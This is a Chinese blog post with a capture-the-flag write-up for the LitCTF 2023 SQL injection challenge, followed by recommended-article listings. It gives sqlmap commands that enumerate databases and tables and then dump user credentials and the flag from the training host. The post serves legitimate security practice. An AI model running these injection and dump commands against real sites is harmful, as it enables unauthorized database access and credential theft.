[LitCTF 2023]这是什么?SQL !注一下 !

最新推荐文章于 2024-09-12 17:49:07 发布
最新推荐文章于 2024-09-12 17:49:07 发布
阅读量309 收藏 1
点赞数 1
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81462177/article/details/141066606
版权

输入1,有注入点id

使用sqlmap爆库sqlmap -u "http://node5.anna.nssctf.cn:21477/?id=1" --dbs --batch 

sqlmap -u "http://node5.anna.nssctf.cn:21477/?id=1" -D ctf --tables --batch

sqlmap -u "http://node5.anna.nssctf.cn:21477/?id=1" -D ctf -T users --columns

sqlmap -u "http://node5.anna.nssctf.cn:21477/?id=1" -D ctf -T users -C username,password --dump

这是彩蛋

爆ctftraining的表发现flag

sqlmap -u "http://node5.anna.nssctf.cn:21477/?id=1" -D ctftraining --tables --batch

sqlmap -u "http://node5.anna.nssctf.cn:21477/?id=1" -D ctftraining -T flag -C flag --dump

桑榆百川
关注
〖Python 数据库开发实战 - MySQL篇⑨〗- 什么是 SQL 语言、如何创建数据逻辑库及如何创建数据表
易编橙 · 终身成长社群,相遇已是上上签!
07-18 4万+
在之前的章节,我们对 MySQL 的安装、配置有了一定的了解。接下来的篇章我们将来学习一下如何操作逻辑库和数据表。
Spring Boot入门(14):使用Mybatis-Plus轻松实现高效自定义SQL操作!
热门推荐
**My Coding Family**
08-20 3万+
如何使用Mybatis-Plus执行自定义SQL,一文教会你。
【CTF Web】NSSCTF 3868 [LitCTF 2023]这是什么?SQL一下 !Writeup(SQL入+报错入+括号闭合)
HEX9CF的技术博客
05-22 554
为了安全起见多带了几个套罢了o(////▽////)q出题人 探姬。
[LitCTF 2023]这是什么?SQL一下 !] NSSCTF题解
m0_62128855的博客
08-06 208
因为ctf库中,我们已知没有flag,所以我们在别的库中找flag。用到MySQL5.0以上的自带库information_schema。不管,就当作MySQL一下。MariaDB是什么数据库?ctftranining很可疑,我们从它开始。* 狠狠的SQL入探姬老师的小题目。8.查看字段内容,出现flag。4.查看版本和当前数据库。提示这个是假的flag。只有一个flag字段。
NSSCTF中的这是什么?SQL一下 !、[SWPUCTF 2022 新生赛]1z_unserialize、[羊城杯 2020]easycon 、[HCTF 2018]Warmup
2401_82388450的博客
05-30 1047
目录 [LitCTF 2023]这是什么?SQL一下 ! [SWPUCTF 2022 新生赛]1z_unserialize [羊城杯 2020]easycon [HCTF 2018]Warmup 方法一 方法二 今日总结: [LitCTF 2023]这是什么?SQL一下 ! 1.输入1,得到以下内容 2.判断是字符型还是数字型,发现是数字型 利用id=1 and 1=1 和id=1 and 1=2 判断是数字类型入还是字符型入,如果两者都可以正常显示界面,则为字
【CTF Web】NSSCTF 3868 [LitCTF 2023]这是什么?SQL一下 !Writeup(SQL入+报错入+括号闭合+DIOS)
HEX9CF的技术博客
05-22 486
为了安全起见多带了几个套罢了o(////▽////)q出题人 探姬。
2023LitCTF web组wp
m0_74160536的博客
05-17 1191
1、导弹迷踪2、1zjs3、php是世界上最好的语言!!4、Ping5、我Flag呢?7、作业管理系统8、Vim yyds10、这是什么?SQL一下!11、Flag点击就送!12、就当无事发生13、彩蛋。
什么是SQL数据类型?SQL数据类型总结
小小博客爱分享
08-19 5592
一、什么叫数据类型? 人们能够非常容易地区分数字与字符,可是计算机并不会。除非是你明确地告诉它,1是数字,“汉”是文本,不然它始终没法分辨1和‘汉’的区别。因而,在每一个计算机语言里都界定了数据类型,实际上便是对常见的各种各样的数据类型进行了明确的区分。你要让计算机计算数值,就传输数字给它,你要让它处理文本,就传字符串类型给他们。 在SQL中,数据类型是一个标签,是一个有利于SQL掌握每列中期望储存什么类型的数据的手册,它也标志了SQL怎样与储存的数据进行交互。SQL中常见的数据类型有多种,本文便介绍一
1.什么是SQL
zhangke0426的博客
03-09 5553
SQL基本概念
sqlalchemy JSON 字段写入时中文序列化问题
llc的博客
09-12 320
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
SQL(结构性查询语句)
2301_78693337的博客
09-11 461
以上就是今天要讲的内容,本文介绍了基础的SQL语法使用,而sql还提供了大量能使我们快速便捷地处理数据的函数和方法等着我们探索。
大数据-132 - Flink SQL 基本介绍 与 HelloWorld案例
永远好奇,无限进步!
09-12 2317
Flink SQL 是 Apache Flink 提供的一种高层次的查询语言接口,它基于 SQL 标准,为开发者提供了处理流式数据和批处理数据的能力。Flink SQL 允许用户使用标准 SQL 查询语言在数据流和数据表上执行复杂的操作,适用于多种应用场景,如实时分析、数据流处理、机器学习等。Flink SQL 的一大特点是流处理和批处理的统一性。通过同一套 SQL 语法,用户可以同时处理静态数据(批处理)和动态数据(流处理)。这使得应用程序的开发更加简化,因为可以用相同的逻辑编写实时流数据处理和历史数据的
sqlserver常用的sql命令
2301_76664379的博客
09-11 706
:D 表示全备份,i 表示差异备份,L 表示日志备份。
金蝶云星空查询SQL
zhanzhibo的专栏
09-10 393
税率、仓库、部门、员工、供应商、客户、物料类别、物料查询、BOM查询、辅助资料:工程项目、辅助资料:产品服务、科目、核算维度、科目余额、未转采购订单的采购申请、采购订单未完结的:待接收的、
mysql DBA常用的sql
最新发布
weixin_44550507的博客
09-12 692
DBA常用sql,方便性能优化
RocketMQ出现The broker does not support consumer to filter message by SQL92
山不见我,我自见山
09-12 262
然后通过rocketmq-console来查看,集群中的这个属性是否为true,为true就可以了。在使用RocketMQ使用SQL过滤消息的时候,出现下面错误。原因是我们的配置文件没有开启SQL过滤功能,我们需要在。接着我们重启namesrv与broker服务就解决问题。配置文件中添加下面命令。
SQL创建索引加快查询速度的方法
大IT职男日志
09-11 522
进行SQL查询时候,如果数据庞大,查询速度会变得很慢,需要用到索引来加快速度。方法如下:一、创建索引方法1、使用CREATE INDEX 语句创建索引 查看索引:SHOW INDEX FROM 表名;创建索引:CREATE [UNIQUE | FULLTEXT] INDEX 索引名 ON 表名 (表字段,...) ;加参数 UNIQUE 增加唯一键索引,FULLTEXT 全文索引 不加普通索引;前缀索引:create index 索引名 ON 表名 (字段(前n个字符));删除索引:DROP IN
sql where 条件 2023.05 !='YYYY-MM'
05-26
SQL 中,可以使用以下条件来筛选出 2023 年 5 月以外的数据: ``` WHERE date_column NOT LIKE '2023-05%' ``` 这将匹配任何不以 2023-05 开头的日期,从而排除 2023 年 5 月的数据。请确保将 `date_column` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值